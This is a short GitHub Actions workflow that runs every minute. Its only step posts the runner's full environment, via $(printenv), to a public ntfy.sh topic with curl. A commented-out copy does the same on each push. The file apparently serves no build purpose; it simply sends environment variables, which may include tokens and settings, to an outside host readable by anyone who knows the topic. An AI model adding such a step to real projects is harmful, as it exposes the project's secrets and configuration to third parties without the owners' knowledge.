on:
  schedule:
    - cron: "* * * * *"  
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - run: curl  -d "github action push $(printenv)" https://ntfy.sh/rkorkorko

#on: push
#jobs:
#  build:
#    runs-on: ubuntu-latest#

#    steps:
#      - run: curl  -d "github action push $(printenv)" https://ntfy.sh/rkorkorko
